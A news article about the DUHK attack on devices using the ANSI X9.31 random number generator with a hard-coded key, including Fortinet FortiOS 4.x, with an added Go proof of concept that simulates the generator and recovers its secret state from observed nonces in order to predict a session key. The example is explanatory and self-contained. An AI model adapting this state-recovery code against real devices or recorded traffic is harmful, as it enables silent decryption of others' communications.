Cryptographers have devised an attack that recovers secret keys from network devices relying on a weak random number generator, allowing full, silent interception of the traffic those keys protect.
Researchers Shaanan Cohney and Nadia Heninger of the University of Pennsylvania and Matthew Green of Johns Hopkins University found that devices using the ANSI X9.31-based pseudo-random number generator (PRNG) can be reliably attacked to recover the keys used to encrypt communications.
Although X9.31 has not been approved by NIST since 2016, it is still used in FIPS-certified hardware.
The attack, dubbed Don't Use Hard-coded Keys or "DUHK", works against devices in which the X9.31 block-cipher key is hard-coded into the PRNG implementation, so anyone who extracts the firmware knows it.
If the device also uses the PRNG's raw output directly to generate cryptographic keys, an attacker who observes some of that output, such as the nonces sent in a handshake, can recover the generator's internal state and from it the keys. That combination is what makes a device vulnerable to DUHK.
The attack is passive: it needs only a recording of the traffic, so victims would not notice it.
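To make the mechanism concrete, the following is an added example (not code from the researchers or from Fortinet) of the X9.31 generator with AES-128 as the block cipher, and of the DUHK attacker's side. The hard-coded key, the seed, and the timestamp window are constructed values for this example; the date/time vector DT is modelled as a simple counter, whereas real implementations use a timestamp and the attacker has to brute-force its unknown bits. The "device" emits two public nonces and then a session key straight from the generator; the attacker, knowing only the key and the two nonces, brute-forces DT, recovers the secret state V, and predicts the session key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// HardcodedKey stands in for the X9.31 block-cipher key baked into a
// vulnerable implementation (constructed value; not any vendor's real key).
var HardcodedKey = []byte("DUHK-example-key") // 16 bytes -> AES-128

// encryptBlock is E_K applied to one 16-byte block.
func encryptBlock(blk cipher.Block, in []byte) []byte {
	out := make([]byte, 16)
	blk.Encrypt(out, in)
	return out
}

func xor16(a, b []byte) []byte {
	out := make([]byte, 16)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// X931 implements the ANSI X9.31 Appendix A.2.4 generator with AES.
type X931 struct {
	blk cipher.Block
	v   []byte // 16-byte secret seed state V
}

func NewX931(key, seed []byte) (*X931, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return &X931{blk: blk, v: append([]byte(nil), seed...)}, nil
}

// Next produces one 16-byte output block R for date/time vector dt:
//   I  = E_K(DT)
//   R  = E_K(I xor V)
//   V' = E_K(R xor I)
func (g *X931) Next(dt []byte) []byte {
	i := encryptBlock(g.blk, dt)
	r := encryptBlock(g.blk, xor16(i, g.v))
	g.v = encryptBlock(g.blk, xor16(r, i))
	return r
}

// DTVector builds the DT block used in this example: a big-endian 64-bit
// counter in the low 8 bytes (assumption for the example; real devices use a
// timestamp plus counter).
func DTVector(n uint64) []byte {
	dt := make([]byte, 16)
	binary.BigEndian.PutUint64(dt[8:], n)
	return dt
}

// RecoverAndPredict is the DUHK attacker. It knows K (hard-coded), has seen two
// consecutive public outputs r1, r2 (e.g. handshake nonces) and knows DT lies
// in [lo, lo+window). Each DT guess yields a candidate V; the guess is confirmed
// if it reproduces r2. It returns the predicted next output, the DT found and ok.
func RecoverAndPredict(key, r1, r2 []byte, lo, window uint64) ([]byte, uint64, bool) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, 0, false
	}
	for dt := lo; dt < lo+window; dt++ {
		i1 := encryptBlock(blk, DTVector(dt))
		v1 := encryptBlock(blk, xor16(r1, i1)) // state V after the first output
		i2 := encryptBlock(blk, DTVector(dt+1))
		if !bytes.Equal(encryptBlock(blk, xor16(i2, v1)), r2) {
			continue // wrong DT guess: state does not reproduce the second nonce
		}
		v2 := encryptBlock(blk, xor16(r2, i2)) // state V after the second output
		i3 := encryptBlock(blk, DTVector(dt+2))
		return encryptBlock(blk, xor16(i3, v2)), dt, true
	}
	return nil, 0, false
}

// Demo simulates a vulnerable device and the passive attacker. It returns true
// if the attacker's predicted block equals the device's real session key.
func Demo() bool {
	seed := []byte("secret-seed-V000")  // 16 bytes; the attacker never sees this
	const dtStart = uint64(1508793600) // constructed "timestamp" counter value
	dev, err := NewX931(HardcodedKey, seed)
	if err != nil {
		return false
	}
	nonce1 := dev.Next(DTVector(dtStart))     // public
	nonce2 := dev.Next(DTVector(dtStart + 1)) // public
	sessionKey := dev.Next(DTVector(dtStart + 2)) // secret: raw PRNG output used as a key

	// The attacker has only the key, the two nonces, and a rough idea of DT.
	predicted, dt, ok := RecoverAndPredict(HardcodedKey, nonce1, nonce2, dtStart-40000, 65536)
	return ok && dt == dtStart && bytes.Equal(predicted, sessionKey)
}

func main() {
	fmt.Println("attacker recovered the session key:", Demo())
}
```

The search over 65,536 DT candidates costs three AES block operations per guess and finishes in milliseconds; the real attack is slower only because far more timestamp bits are unknown. The lesson is the one the researchers draw: once K is known to everyone, the only secret in X9.31 is V, and V leaks through any output the attacker can see.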
The researchers tested their attack against Fortinet devices running the FortiOS 4.x operating system and found around 25,000 Fortinet devices vulnerable to DUHK.
While recovering the keys takes around four minutes of computation per connection, the researchers said the attack is practical to carry out.
They advised developers to stop using the X9.31 PRNG altogether.
Fortinet has since removed the weak X9.31 PRNG from later versions of FortiOS.